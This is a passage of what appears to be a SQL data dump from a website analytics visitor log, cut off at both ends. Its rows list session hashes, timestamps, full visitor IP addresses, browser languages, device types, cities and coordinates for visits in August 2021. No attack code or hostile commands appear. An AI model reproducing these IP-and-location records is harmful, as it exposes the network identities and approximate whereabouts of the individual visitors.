17:55:08','5389e290dc74c3b3','41.215.165.246','0','2021-08-12 13:21:30',0,0,1,6,6,2,0,'en-us',4,'Mobile',11,'13:21:16',0,16419,28,1,0,0,0,0,0,0,0,0,0,'',84,8.000000,-2.000000,0),(6,1,'b544bf0e99817d4e','2021-08-12 16:11:33','4ce6f62e4705134c','86.185.4.122','0','2021-08-12 13:41:40',0,0,1,8,21,6,4,'en-GB',2,'Desktop',8,'14:41:39',0,8994,19,1,0,0,0,0,1,0,0,0,0,'Chigwell',235,51.616700,0.083300,0),(7,1,'b6bdd91df3c41c68','2021-08-12 19:46:21','4ce6f62e4705134c','41.191.104.41','38','2021-08-12 14:26:59',0,0,1,9,8,5,0,'en-US',2,'Desktop',8,'14:26:57',0,19178,19,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(8,1,'ec74cc298e6417a3','2021-08-12 14:31:44','ded9f78b24550499','40.77.202.127','0','2021-08-12 14:31:44',0,0,1,6,6,1,0,'en-US',13,'Desktop',12,'07:31:42',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(9,1,'26f38ada2bbb1fbd','2021-08-12 15:08:09','4ce6f62e4705134c','41.86.18.172','0','2021-08-12 14:56:56',0,0,1,1,13,2,10,'en-US',2,'Desktop',8,'14:56:54',0,674,20,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(10,1,'e7cdd3ea5571d92c','2021-08-12 15:08:35','4ce6f62e4705134c','197.215.216.6','0','2021-08-12 15:07:34',0,0,1,11,14,2,0,'en-US',2,'Desktop',8,'15:07:31',0,62,20,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(11,1,'c0a9314dc63a7009','2021-08-12 15:18:28','db3ba43adf65298e','63.247.155.42','0','2021-08-12 15:16:50',0,0,1,9,9,2,0,'en-US',1,'Desktop',13,'18:16:39',0,99,13,1,0,0,0,0,0,0,0,0,0,'Naples',236,26.266500,-81.714600,0),(12,1,'cf87b32218b0371c','2021-08-12 15:18:15','ded9f78b24550499','40.77.188.73','0','2021-08-12 15:18:15',0,0,1,15,15,1,0,'en-US',13,'Desktop',12,'08:18:14',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(13,1,'9c4f066647846cdc','2021-08-12 15:44:41','4ce6f62e4705134c','41.191.105.88','0','2021-08-12 15:44:41',0,0,1,16,16,1,17,'en-US',2,'Desktop',8,'15:53:23',0,164,20,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(14,1,'dc7ad7679c596808','2021-08-12 17:00:15','dd182ebd52f9880c','193.188.156.131','0','2021-08-12 17:00:15',0,0,1,22,22,1,4,'en-US',2,'Desktop',8,'17:00:13',0,11326,19,1,0,0,0,0,1,0,0,0,0,'Stockholm',215,59.332600,18.064900,0),(15,1,'f3b6f729d49c8bd1','2021-08-12 18:15:00','0dc5b8988e8ee121','41.191.104.41','0','2021-08-12 18:15:00',0,0,1,6,6,1,0,'en-US',2,'Desktop',14,'11:14:59',0,896,12,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(16,1,'e403afa26d31fe73','2021-08-12 18:53:16','4e410f535f35c411','41.191.104.41','38','2021-08-12 18:53:16',0,0,1,6,6,1,0,'en-US',1,'Desktop',14,'11:53:15',0,75,12,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(17,1,'cbcf9845916ee09f','2021-08-12 19:18:34','ded9f78b24550499','40.77.190.90','0','2021-08-12 19:18:34',0,0,1,24,24,1,0,'en-US',13,'Desktop',12,'12:18:32',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(18,1,'e14e00eab3c31a86','2021-08-12 19:36:25','974d2d23a94cdc18','41.86.17.106','0','2021-08-12 19:36:25',0,0,1,3,3,1,4,'en-us',4,'Desktop',14,'19:36:24',0,47,12,1,0,0,0,1,1,0,0,0,0,'',126,6.500000,-9.500000,0),(19,1,'79573a4e844e785f','2021-08-12 19:41:18','b04321118fe34cfd','41.57.95.72','0','2021-08-12 19:41:18',0,0,1,3,3,1,0,'en-US',2,'Mobile',10,'19:41:04',0,5,29,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(20,1,'2d05fafe51eb7852','2021-08-12 20:19:17','ded9f78b24550499','40.77.202.99','0','2021-08-12 20:19:17',0,0,1,25,25,1,0,'en-US',13,'Desktop',12,'13:19:16',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(21,1,'16d39bfe8c2a779e','2021-08-12 20:29:43','ded9f78b24550499','40.77.202.50','0','2021-08-12 20:29:43',0,0,1,26,26,1,0,'en-US',13,'Desktop',12,'13:29:41',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(22,1,'f1199353911d7977','2021-08-12 20:45:07','ae4566657cc42040','91.73.12.125','0','2021-08-12 20:42:57',0,0,1,27,28,2,4,'en-US',2,'Mobile',10,'20:42:55',0,149,30,1,0,0,0,0,0,0,0,0,0,'Dubai',234,25.258200,55.304700,0),(23,1,'c2b6249eafe7613d','2021-08-12 20:55:30','015920a83a1dff04','97.70.146.113','0','2021-08-12 20:55:30',0,0,1,1,1,1,0,'en-us',4,'Mobile',11,'16:55:28',0,31,31,1,0,0,0,0,0,0,0,0,0,'Novi',236,42.473500,-83.522400,0),(24,1,'13051adba4f13ad8','2021-08-12 21:36:01','c8662db60ec8ad1d','41.57.95.93','0','2021-08-12 21:36:01',0,0,1,29,29,1,0,'en-GB',2,'Mobile',10,'14:35:58',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(25,1,'d68e79dcc3754725','2021-08-12 21:36:56','718f5a9ab64b85db','41.57.95.93','0','2021-08-12 21:36:56',0,0,1,29,29,1,0,'en-GB',2,'Mobile',10,'21:36:41',0,0,32,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(26,1,'94ea57bac25a930e','2021-08-12 23:06:37','ded9f78b24550499','40.77.190.17','0','2021-08-12 23:06:37',0,0,1,12,12,1,0,'en',13,'Desktop',12,'16:06:35',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(27,1,'2c3f163cf4e456c6','2021-08-12 23:26:09','ded9f78b24550499','40.77.189.232','0','2021-08-12 23:26:09',0,0,1,1,1,1,0,'en-US',13,'Desktop',12,'16:26:08',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(28,1,'97bc44393615646f','2021-08-13 01:07:21','ded9f78b24550499','40.77.188.211','0','2021-08-13 01:07:21',0,0,1,30,30,1,0,'en',13,'Desktop',12,'18:07:19',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(29,1,'16eac28561f18e05','2021-08-13 03:46:08','4ce6f62e4705134c','75.9.111.40','0','2021-08-13 03:28:48',0,0,1,1,13,3,31,'en-US',2,'Desktop',8,'22:28:46',0,1303,22,1,0,0,0,0,1,0,0,0,0,'Milwaukee',236,43.162400,-87.989800,0),(30,1,'927a8dddfa409b1c','2021-08-13 03:48:45','ded9f78b24550499','40.77.202.163','0','2021-08-13 03:48:45',0,0,1,32,32,1,0,'en-US',13,'Desktop',12,'20:48:43',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(31,1,'ac95b4cd9e9d394f','2021-08-13 07:11:02','4ce6f62e4705134c','96.2.140.162','0','2021-08-13 04:36:55',0,0,1,8,34,7,4,'en-US',2,'Desktop',8,'23:36:52',0,9442,33,1,0,0,0,0,1,0,0,0,0,'West Fargo',236,46.890700,-96.925800,0),(32,1,'de335d12e831eb9d','2021-08-13 05:35:51','00888ab739c2dca6','41.191.107.159','0','2021-08-13 05:35:51',0,0,1,35,35,1,4,'en-us',4,'Desktop',14,'05:35:50',0,0,13,1,0,0,0,1,1,0,0,0,0,'',126,6.500000,-9.500000,0),(33,1,'69568822807801b1','2021-08-13 06:08:34','ded9f78b24550499','40.77.139.71','0','2021-08-13 06:08:34',0,0,1,36,36,1,0,'en-US',13,'Desktop',12,'23:08:33',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(34,1,'b6bdd91df3c41c68','2021-08-13 06:51:16','4ce6f62e4705134c','41.191.104.41','38','2021-08-13 06:51:16',0,0,1,9,8,5,0,'en-US',2,'Desktop',8,'06:51:13',0,19178,19,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(35,1,'9e863d032d64e958','2021-08-13 07:03:33','aeaecdb0082d3146','197.89.156.44','0','2021-08-13 07:03:33',0,0,1,37,37,1,4,'en-gb',4,'Desktop',14,'09:03:32',0,0,12,1,0,0,0,0,1,0,0,0,0,'Cape Town',206,-33.916700,18.416700,0),(36,1,'66c16028e4fc14b1','2021-08-13 08:13:26','4ce6f62e4705134c','109.134.112.12','0','2021-08-13 08:08:24',0,0,1,39,9,3,4,'en-US',2,'Desktop',8,'10:08:20',0,355,20,1,0,0,0,0,1,0,0,0,0,'Brussels',22,50.846600,4.352800,0),(37,1,'5e7b6b1236e7f21e','2021-08-13 08:15:25','4571093d73ef6337','13.124.6.88','0','2021-08-13 08:15:25',0,0,1,5,5,1,0,'en-US',1,'Desktop',8,'08:15:24',0,0,22,1,0,0,0,0,0,0,0,0,0,'Incheon',119,37.453600,126.731700,0),(38,1,'b1baa8df363a32fc','2021-08-13 12:18:01','5f24e765daff4328','41.86.8.146','0','2021-08-13 08:21:14',0,0,1,40,5,29,4,'en-US',1,'Desktop',8,'08:21:12',0,14208,20,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(39,1,'62ce99a7c7a87750','2021-08-13 08:28:43','baff98a24b276dc6','173.252.87.111','0','2021-08-13 08:28:43',0,0,1,41,41,1,42,'en-US',4,'Mobile',11,'01:28:41',0,21,25,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(40,1,'faa64bc95737a19b','2021-08-13 09:22:37','4ce6f62e4705134c','132.147.124.181','0','2021-08-13 09:22:37',0,0,1,48,48,1,4,'en-US',2,'Desktop',8,'17:22:36',0,0,19,1,0,0,0,0,1,0,0,0,0,'Singapore',200,1.293100,103.855800,0),(41,1,'10f5e5a30344c4c5','2021-08-13 09:31:12','ded9f78b24550499','40.77.190.135','0','2021-08-13 09:31:12',0,0,1,36,36,1,0,'en-US',13,'Desktop',12,'02:31:11',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(42,1,'a832dde1b73dad9b','2021-08-13 10:42:23','4ce6f62e4705134c','41.191.107.150','0','2021-08-13 10:42:23',0,0,1,1,1,1,10,'en-US',2,'Desktop',8,'10:44:47',0,1327,20,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(43,1,'dc5e292012f9fb9d','2021-08-13 11:02:02','d8a4831bc733fafd','128.68.184.102','0','2021-08-13 11:02:02',0,0,1,40,40,1,49,'en-US',3,'Desktop',8,'14:02:14',0,0,22,1,0,0,0,0,1,0,0,0,0,'Lyubertsy',183,55.677800,37.883300,0),(44,1,'ffcb56100c11a382','2021-08-13 13:46:57','4ce6f62e4705134c','41.86.7.58','0','2021-08-13 11:05:19',0,0,1,50,50,2,10,'en-US',2,'Desktop',8,'11:05:10',0,9699,21,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(45,1,'d2f6bbcc92e39cde','2021-08-13 11:14:29','39299172ab1dd88b','83.225.88.229','0','2021-08-13 11:14:29',0,0,1,25,25,1,0,'it-IT',2,'Desktop',14,'13:14:28',0,10781,22,1,0,0,0,0,1,0,0,0,0,'',110,43.147900,12.109700,0),(46,1,'f3f15963ae57a7f2','2021-08-13 11:54:52','4ce6f62e4705134c','41.191.104.40','0','2021-08-13 11:15:17',0,0,1,52,52,3,10,'en-US',2,'Desktop',8,'11:15:11',0,2376,20,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(47,1,'25e9e59d695393ac','2021-08-13 11:39:27','d354e99fe704ad73','196.250.179.11','0','2021-08-13 11:31:46',0,0,1,53,53,3,4,'en-US',1,'Desktop',8,'11:31:44',0,462,20,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(48,1,'2bc670b86a9dd752','2021-08-13 11:36:51','4ce6f62e4705134c','41.86.7.38','0','2021-08-13 11:36:25',0,0,1,1,13,1,10,'en-US',2,'Desktop',8,'04:33:12',0,27,19,1,0,0,0,0,1,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(49,1,'97bd1d8707be45f3','2021-08-13 12:14:03','4ce6f62e4705134c','197.215.23.158','0','2021-08-13 12:14:03',0,0,1,56,56,1,0,'en-US',2,'Desktop',8,'12:14:02',0,76,34,1,0,0,0,0,1,0,0,0,0,'',199,8.500000,-11.500000,0),(50,1,'af6cde098b9eb2ae','2021-08-13 12:19:06','97363c23b27785a4','169.252.4.21','0','2021-08-13 12:18:49',0,0,1,1,1,1,10,'en-US',2,'Desktop',8,'12:18:48',0,18,14,1,0,0,0,0,0,0,0,0,0,'Washington',236,38.893300,-77.014600,0),(51,1,'39eb0453e33558de','2021-08-13 12:42:16','ded9f78b24550499','40.77.139.14','0','2021-08-13 12:42:16',0,0,1,58,58,1,0,'en',13,'Desktop',12,'05:42:15',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(52,1,'443e17d9074b2205','2021-08-13 13:55:03','edecc252113cf1b4','41.191.107.157','0','2021-08-13 13:48:43',0,0,1,1,59,4,4,'en-US',2,'Mobile',3,'13:49:22',0,381,27,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(53,1,'6c0d1fcac162a302','2021-08-13 14:00:55','4ce6f62e4705134c','164.160.11.46','0','2021-08-13 13:59:38',0,0,1,61,61,3,17,'en-US',2,'Desktop',8,'14:02:28',0,78,19,1,0,0,0,0,1,0,0,0,0,'Tubmanburg',126,6.870800,-10.817200,0),(54,1,'b9a1cc9e53471194','2021-08-13 15:07:54','ded9f78b24550499','40.77.189.65','0','2021-08-13 15:07:54',0,0,1,8,8,1,0,'en-US',13,'Desktop',12,'08:07:53',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(55,1,'f73af3570c03833e','2021-08-13 17:41:28','39c42bb70ab72dfa','41.86.7.14','0','2021-08-13 17:41:28',0,0,1,34,34,1,4,'en-US',2,'Mobile',10,'17:41:25',0,31,35,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(56,1,'5d98ffe7525f1254','2021-08-13 20:04:14','ded9f78b24550499','40.77.188.35','0','2021-08-13 20:04:14',0,0,1,50,50,1,0,'en',13,'Desktop',12,'13:04:12',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(57,1,'2e09f959ce909e70','2021-08-13 20:28:07','ded9f78b24550499','40.77.189.136','0','2021-08-13 20:28:07',0,0,1,52,52,1,0,'en-US',13,'Desktop',12,'13:28:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(58,1,'d7d01526a5770fb8','2021-08-13 23:18:01','9fb9b1676489e356','41.57.95.142','0','2021-08-13 23:07:18',0,0,1,1,1,8,4,'en-US',2,'Mobile',10,'23:07:16',0,644,36,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(59,1,'596252a0747c5d04','2021-08-14 00:45:19','ded9f78b24550499','40.77.189.121','0','2021-08-14 00:45:19',0,0,1,64,64,1,0,'en-US',13,'Desktop',12,'17:45:18',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(60,1,'6565e9301cacfc54','2021-08-14 01:47:02','ded9f78b24550499','40.77.190.233','0','2021-08-14 01:47:02',0,0,1,65,65,1,0,'en',13,'Desktop',12,'18:47:02',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(61,1,'52504b16aa88920a','2021-08-14 03:42:25','ded9f78b24550499','40.77.191.231','0','2021-08-14 03:42:25',0,0,1,66,66,1,0,'en',13,'Desktop',12,'20:42:21',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(62,1,'58dd87a255484962','2021-08-14 03:58:42','4ce6f62e4705134c','41.191.105.88','0','2021-08-14 03:58:32',0,0,1,67,68,1,0,'en-US',2,'Desktop',8,'03:58:30',0,109,19,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(63,1,'5d742a932d9b935e','2021-08-14 08:45:22','ded9f78b24550499','40.77.189.73','0','2021-08-14 08:45:22',0,0,1,30,30,1,0,'en',13,'Desktop',12,'01:45:21',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(64,1,'851e3a7fbb3221f4','2021-08-14 09:24:29','63f05730ae762a41','41.191.107.151','0','2021-08-14 09:16:14',0,0,1,69,23,4,42,'en-US',2,'Mobile',10,'09:16:13',0,496,37,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(65,1,'30a0d1dbfe8ac4b8','2021-08-14 09:48:53','4ce6f62e4705134c','223.225.112.177','0','2021-08-14 09:48:53',0,0,1,70,70,1,31,'en-GB',2,'Desktop',8,'15:18:52',0,0,20,1,0,0,0,0,1,0,0,0,0,'New Delhi',103,28.600000,77.200000,0),(66,1,'54582b98ec3f0bad','2021-08-14 10:50:04','4fa706ca6bee6557','27.115.124.101','0','2021-08-14 10:50:04',0,0,1,5,5,1,71,'en',2,'Mobile',10,'18:50:03',0,0,2,1,0,0,0,0,0,0,0,0,0,'Shanghai',46,31.045600,121.399700,0),(67,1,'53247ff94a6baa25','2021-08-14 11:30:09','ded9f78b24550499','40.77.191.132','0','2021-08-14 11:30:09',0,0,1,72,72,1,0,'en',13,'Desktop',12,'04:30:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(68,1,'25ed96afa3180ed7','2021-08-14 12:38:33','5305ec78a98d17db','41.57.95.199','0','2021-08-14 12:38:33',0,0,1,73,73,1,4,'en-US',2,'Mobile',10,'12:38:30',0,30,38,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(69,1,'cbe63f5f35bb6b7c','2021-08-14 12:44:36','23971f8429f12b1a','41.57.95.239','0','2021-08-14 12:44:36',0,0,1,39,39,1,4,'en-US',2,'Mobile',10,'12:44:34',0,108,39,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(70,1,'a5f620902a18006e','2021-08-14 13:14:42','d354e99fe704ad73','84.189.90.222','0','2021-08-14 13:14:42',0,0,1,74,74,1,75,'de',1,'Desktop',8,'15:14:42',0,0,33,1,0,0,0,0,0,0,0,0,0,'Bonn',83,50.681300,7.154600,0),(71,1,'ec93d559f345ef4f','2021-08-14 13:22:58','9e82778438853ccc','41.191.105.93','0','2021-08-14 13:22:58',0,0,1,69,69,1,42,'en-US',2,'Mobile',10,'13:22:56',0,0,39,1,0,0,0,0,0,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(72,1,'d2f6bbcc92e39cde','2021-08-14 13:56:46','39299172ab1dd88b','83.225.88.229','0','2021-08-14 13:56:46',0,0,1,25,25,1,0,'it-IT',2,'Desktop',14,'15:56:47',0,10781,22,1,0,0,0,0,1,0,0,0,0,'',110,43.147900,12.109700,0),(73,1,'4698baf817679530','2021-08-14 16:12:07','ded9f78b24550499','40.77.190.8','0','2021-08-14 16:12:07',0,0,1,39,39,1,0,'en-US',13,'Desktop',12,'09:12:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(74,1,'f8e69f346f692304','2021-08-14 16:17:32','9e82778438853ccc','41.191.104.119','0','2021-08-14 16:17:32',0,0,1,76,76,1,4,'en-US',2,'Mobile',10,'16:17:29',0,16,27,1,0,0,0,0,0,0,0,0,0,'Monrovia',126,6.310600,-10.804700,0),(75,1,'1eee6a1beaa9d6cd','2021-08-14 16:17:49','5f24e765daff4328','41.57.95.81','0','2021-08-14 16:17:37',0,0,1,5,9,2,0,'en-US',1,'Desktop',8,'09:17:26',0,1498,33,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(76,1,'f11bda5756096970','2021-08-14 17:51:00','edecc252113cf1b4','66.249.73.99','0','2021-08-14 17:51:00',0,0,1,77,77,1,0,'en-US',2,'Desktop',3,'10:50:10',0,0,40,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(77,1,'62ac29814bddba7e','2021-08-14 21:41:07','ded9f78b24550499','40.77.139.28','0','2021-08-14 21:41:07',0,0,1,78,78,1,0,'en-US',13,'Desktop',12,'14:41:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(78,1,'7f70394071d87bbf','2021-08-14 22:23:48','4ce6f62e4705134c','41.191.105.94','0','2021-08-14 22:23:48',0,0,1,70,70,1,4,'en-US',2,'Desktop',8,'22:23:46',0,0,33,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(79,1,'2fd6daf60a9d540e','2021-08-14 22:48:22','5389e290dc74c3b3','41.191.105.94','0','2021-08-14 22:46:01',0,0,1,79,80,2,4,'en-us',4,'Mobile',11,'22:45:59',0,142,25,1,0,0,0,0,0,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(80,1,'044bb3ca6f82588e','2021-08-14 22:47:45','9e82778438853ccc','172.58.157.231','0','2021-08-14 22:47:45',0,0,1,27,27,1,4,'en-US',2,'Mobile',10,'18:47:43',0,0,41,1,0,0,0,0,0,0,0,0,0,'San Juan',179,18.466300,-66.105700,0),(81,1,'e33b9b2d283372be','2021-08-14 23:12:53','ded9f78b24550499','40.77.190.199','0','2021-08-14 23:12:53',0,0,1,81,81,1,0,'en-US',13,'Desktop',12,'16:12:52',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(82,1,'6d6c8d89cd1d69c8','2021-08-14 23:21:54','63f05730ae762a41','41.191.107.214','0','2021-08-14 23:21:54',0,0,1,1,1,1,4,'en-US',2,'Mobile',10,'23:21:18',0,711,42,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(83,1,'319fc30070a83d31','2021-08-14 23:23:28','ded9f78b24550499','40.77.189.96','0','2021-08-14 23:23:28',0,0,1,34,34,1,0,'en-US',13,'Desktop',12,'16:23:26',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(84,1,'ff3e561ef4799980','2021-08-15 00:21:37','ded9f78b24550499','40.77.191.157','0','2021-08-15 00:21:37',0,0,1,82,82,1,0,'en',13,'Desktop',12,'17:21:35',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(85,1,'7f70394071d87bbf','2021-08-15 00:42:24','4ce6f62e4705134c','41.191.105.94','0','2021-08-15 00:42:24',0,0,1,70,70,1,4,'en-US',2,'Desktop',8,'00:42:22',0,0,33,1,0,0,0,0,1,0,0,0,0,'Robertsport',126,6.753300,-11.368600,0),(86,1,'d8621baf679cbdbd','2021-08-15 01:25:35','ded9f78b24550499','40.77.139.122','0','2021-08-15 01:25:35',0,0,1,30,30,1,0,'en',13,'Desktop',12,'18:25:31',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(87,1,'1e4c0350fe175a9a','2021-08-15 01:43:56','ded9f78b24550499','40.77.188.156','0','2021-08-15 01:43:56',0,0,1,30,30,1,0,'en',13,'Desktop',12,'18:43:54',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(88,1,'6b9be6cfa7c1c9ba','2021-08-15 02:43:46','ded9f78b24550499','40.77.190.167','0','2021-08-15 02:43:46',0,0,1,83,83,1,0,'en',13,'Desktop',12,'19:43:45',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(89,1,'25ed96afa3180ed7','2021-08-15 03:30:07','5305ec78a98d17db','41.57.95.199','0','2021-08-15 03:30:07',0,0,1,73,73,1,4,'en-US',2,'Mobile',10,'03:30:04',0,32,38,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(90,1,'9b8e691ceb66d653','2021-08-15 04:07:08','ded9f78b24550499','40.77.188.32','0','2021-08-15 04:07:08',0,0,1,30,30,1,0,'en',13,'Desktop',12,'21:07:06',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(91,1,'588835bb4aef61d0','2021-08-15 04:08:07','ded9f78b24550499','40.77.188.44','0','2021-08-15 04:08:07',0,0,1,84,84,1,0,'en',13,'Desktop',12,'21:08:05',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(92,1,'6ff908afad68c9b0','2021-08-15 04:17:14','edecc252113cf1b4','66.249.73.99','0','2021-08-15 04:17:14',0,0,1,77,77,1,0,'en-US',2,'Desktop',3,'21:16:23',0,0,40,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(93,1,'27fde2a348f8d20a','2021-08-15 04:31:15','5389e290dc74c3b3','209.122.205.15','0','2021-08-15 04:31:15',0,0,1,77,77,1,4,'en-us',4,'Mobile',11,'04:31:14',0,0,25,1,0,0,0,0,0,0,0,0,0,'New York',236,40.754700,-73.992500,0),(94,1,'6086ca20a0b9edd6','2021-08-15 05:09:51','b4c63e4931a0543d','49.193.104.45','0','2021-08-15 05:07:25',0,0,1,61,85,2,4,'en-US',2,'Desktop',12,'15:07:24',0,200,21,1,0,0,0,0,1,0,0,0,0,'',14,-33.494000,143.210400,0),(95,1,'7d6ee8e8d4b78679','2021-08-15 05:16:59','4331742a2a0f801f','41.191.107.39','0','2021-08-15 05:15:36',0,0,1,86,87,2,4,'en-us',4,'Mobile',11,'05:15:35',0,84,25,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(96,1,'de4ca55714767982','2021-08-15 05:47:02','ded9f78b24550499','40.77.188.132','0','2021-08-15 05:47:02',0,0,1,88,88,1,0,'en-US',13,'Desktop',12,'22:47:01',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(97,1,'56ca87dbec5f23a3','2021-08-15 07:19:59','ded9f78b24550499','40.77.190.98','0','2021-08-15 07:19:59',0,0,1,1,1,1,0,'en',13,'Desktop',12,'07:19:56',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(98,1,'77b3fb9392271f37','2021-08-15 07:39:56','ded9f78b24550499','40.77.202.6','0','2021-08-15 07:39:56',0,0,1,89,89,1,0,'en-US',13,'Desktop',12,'07:39:54',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(99,1,'3e514f571887142c','2021-08-15 08:14:54','4331742a2a0f801f','102.176.94.166','0','2021-08-15 08:14:02',0,0,1,27,90,1,4,'en-us',4,'Mobile',11,'08:14:01',0,95,43,1,0,0,0,0,0,0,0,0,0,'',84,8.000000,-2.000000,0),(100,1,'5235c3903840a0ad','2021-08-15 08:46:46','ded9f78b24550499','40.77.139.78','0','2021-08-15 08:46:46',0,0,1,76,76,1,0,'en-US',13,'Desktop',12,'01:46:39',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(101,1,'b544bf0e99817d4e','2021-08-15 09:12:51','4ce6f62e4705134c','86.185.4.122','0','2021-08-15 09:12:51',0,0,1,8,21,6,0,'en-GB',2,'Desktop',8,'10:12:50',0,8994,19,1,0,0,0,0,1,0,0,0,0,'Chigwell',235,51.616700,0.083300,0),(102,1,'edd10b54c8d896c8','2021-08-15 10:05:59','ded9f78b24550499','40.77.139.115','0','2021-08-15 10:05:59',0,0,1,91,91,1,0,'en-US',13,'Desktop',12,'03:05:57',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(103,1,'17429cc38c623408','2021-08-15 10:13:04','ded9f78b24550499','40.77.188.135','0','2021-08-15 10:13:04',0,0,1,92,92,1,0,'en',13,'Desktop',12,'03:13:02',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(104,1,'648449973ac5b8b4','2021-08-15 10:13:27','ded9f78b24550499','40.77.190.202','0','2021-08-15 10:13:27',0,0,1,93,93,1,0,'en',13,'Desktop',12,'03:13:23',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(105,1,'6c9f9974aea0e57f','2021-08-15 10:23:56','9fb9b1676489e356','41.57.95.40','0','2021-08-15 10:23:56',0,0,1,15,15,1,4,'en-US',2,'Mobile',10,'10:23:49',0,11,44,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(106,1,'775a2e1675a88ec6','2021-08-15 10:31:15','ded9f78b24550499','40.77.190.33','0','2021-08-15 10:31:15',0,0,1,94,94,1,0,'en',13,'Desktop',12,'03:31:13',0,0,2,1,0,0,0,0,0,0,0,0,0,'Chicago',236,41.848300,-87.651700,0),(107,1,'1e2c7ce3869af143','2021-08-15 11:25:32','1bcbede772ff6e14','154.124.84.56','0','2021-08-15 